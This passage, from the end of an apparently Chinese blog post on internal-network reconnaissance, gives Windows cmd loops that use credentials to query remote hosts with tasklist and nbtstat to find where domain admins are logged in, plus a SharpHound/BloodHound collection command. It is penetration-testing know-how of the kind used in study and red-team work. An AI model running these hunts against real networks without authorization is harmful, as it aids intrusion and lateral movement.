</span><span class="lnt">2
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl"><span class="k">FOR</span> <span class="k">/F</span> <span class="nv">%i in (ips.txt) DO @echo [+] %</span>i <span class="p">&amp;&amp;</span> @tasklist /V /S %i /U user /P password <span class="mi">2</span><span class="p">&gt;</span>NUL <span class="p">&gt;</span> output.txt <span class="p">&amp;&amp;</span> 
</span></span><span class="line"><span class="cl"><span class="k">FOR</span> <span class="k">/F</span> <span class="nv">%n in (names.txt) DO @type output.txt | findstr %</span>n <span class="p">&gt;</span> NUL <span class="p">&amp;&amp;</span> echo [!] <span class="nv">%n was found running a process on %</span>i <span class="p">&amp;&amp;</span> <span class="k">pause</span>
</span></span></code></pre></td></tr></table>
</div>
</div><h3 id="扫描远程系统的-netbios-信息">扫描远程系统的 NetBIOS 信息</h3>
<p>首先，从<code>Domain Admins</code>组中收集域管理员列表</p>
<p>然后，将目标 <code>ip</code> 加到 <code>ips.txt</code> ，将收集的域管理员列表加到 admins.txt ` 文件。</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl"><span class="k">for</span> <span class="k">/F</span> <span class="nv">%i in (ips.txt) do @echo [+] Checking %</span>i <span class="p">&amp;&amp;</span> nbtstat -A <span class="nv">%i 2&gt;NUL &gt;nbsessions.txt &amp;&amp; FOR /F %</span>n in (admins.txt<span class="p">)</span> <span class="k">DO</span> <span class="p">@</span><span class="k">type</span> nbsessions.txt <span class="p">|</span> findstr /I <span class="nv">%n &gt; NUL &amp;&amp; echo [!] %</span>n was found logged into %i
</span></span></code></pre></td></tr></table>
</div>
</div><h3 id="bloodhound-工具">BloodHound 工具</h3>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">brew services start neo4j
</span></span></code></pre></td></tr></table>
</div>
</div><h4 id="收集脚本">收集脚本</h4>
<p><a href="https://github.com/BloodHoundAD/BloodHound/tree/master/Ingestors" target="_blank" rel="noopener noreffer">https://github.com/BloodHoundAD/BloodHound/tree/master/Ingestors</a></p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">SharpHound.exe -c all
</span></span></code></pre></td></tr></table>
</div>
</div></div><div class="post-footer" id="post-footer">
    <div class="post-info">
        <div class="post-info-line">
            <div class="post-info-mod">
                <span>更新于 2020-02-13</span>
            </div>
            <div class="post-info-license"></div>
        </div>
        <div class="post-info-line">
            <div class="post-info-md"></div>
            <div class="post-info-share">
                <span><a href="javascript:void(0);" title="分享到 微博" data-sharer="weibo" data-url="https://www.geekby.site/2020/02/%E5%86%85%E7%BD%91%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/" data-title="内网信息收集"><i class="fab fa-weibo fa-fw"></i></a><a href="javascript:void(0);" title="分享到 Evernote" data-sharer="evernote" data-url="https://www.geekby.site/2020/02/%E5%86%85%E7%BD%91%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/" data-title="内网信息收集"><i class="fab fa-evernote fa-fw"></i></a><a href="javascript:void(0);" title="分享到 Skype" data-sharer="skype" data-url="https://www.geekby.site/2020/02/%E5%86%85%E7%BD%91%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/" data-title="内网信息收集"><i class="fab fa-skype fa-fw"></i></a></span>
            </div>
        </div>
    </div>

    <div class="post-info-more">
        <section class="post-tags"><i class="fas fa-tags fa-fw"></i>&nbsp;<a href="/tags/%E5%9F%9F%E5%AE%89%E5%85%A8/">域安全</a>,&nbsp;<a href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">内网渗透</a>,&nbsp;<a href="/tags/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/">信息收集</a></section>
        <section>
            <span><a href="javascript:void(0);" onclick="window.history.back();">返回</a></span>&nbsp;|&nbsp;<span><a href="/">主页</a></span>
        </section>
    </div>

    <div class="post-nav"><a href="/2020/02/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E6%B5%81%E7%A8%8B/" class="prev" rel="prev" title="内网渗透流程"><i class="fas fa-angle-left fa-fw"></i>内网渗透流程</a>
            <a href="/2020/02/%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87%E9%98%B2%E5%BE%A1%E5%88%86%E6%9E%90/" class="next" rel="next" title="权限提升防御分析">权限提升防御分析<i class="fas fa-angle-right fa-fw"></i></a></div>
</div>
</article></div>
            </main><footer class="footer">
        <div class="footer-container"><div class="footer-line"><i class="far fa-copyright fa-fw"></i><span itemprop="copyrightYear">2019 - 2022</span><span class="author" itemprop="copyrightHolder">&nbsp;<a href="/" target="_blank">Geekby</a></span>&nbsp;|&nbsp;<span class="license"><a rel="license external nofollow noopener noreffer" href="https://creativecommons.org/licenses/by-nc/4.0/" target="_blank">CC BY-NC 4.0</a></span></div>
        </div>
    </footer></div>

        <div id="fixed-buttons"><a href="#" id="back-to-top" class="fixed-button" title="回到顶部">
                <i class="fas fa-arrow-up fa-fw"></i>
            </a><a href="#" id="view-comments" class="fixed-button" title="查看评论">
                <i class="fas fa-comment fa-fw"></i>
            </a>
        </div><link rel="stylesheet" href="/lib/lightgallery/lightgallery.min.css"><script type="text/javascript" src="/lib/smooth-scroll/smooth-scroll.min.js"></script><script type="text/javascript" src="/lib/autocomplete/autocomplete.min.js"></script><script type="text/javascript" src="/lib/algoliasearch/algoliasearch-lite.umd.min.js"></script><script type="text/javascript" src="/lib/lazysizes/lazysizes.min.js"></script><script type="text/javascript" src="/lib/lightgallery/lightgallery.min.js"></script><script type="text/javascript" src="/lib/lightgallery/lg-thumbnail.min.js"></script><script type="text/javascript" src="/lib/lightgallery/lg-zoom.min.js"></script><script type="text/javascript" src="/lib/clipboard/clipboard.min.js"></script><script type="text/javascript" src="/lib/sharer/sharer.min.js"></script><script type="text/javascript">window.config={"code":{"copyTitle":"复制到剪贴板","maxShownLines":100},"comment":{},"lightGallery":{"actualSize":false,"exThumbImage":"data-thumbnail","hideBarsDelay":2000,"selector":".lightgallery","speed":400,"thumbContHeight":80,"thumbWidth":80,"thumbnail":true},"search":{"algoliaAppID":"C19A58DMI2","algoliaIndex":"blog","algoliaSearchKey":"a7203b4397475a3fcf49cea4495e0987","highlightTag":"em","maxResultLength":10,"noResultsFound":"没有找到结果","snippetLength":50,"type":"algolia"}};</script><script type="text/javascript" src="/js/theme.min.js"></script></body>
</html>
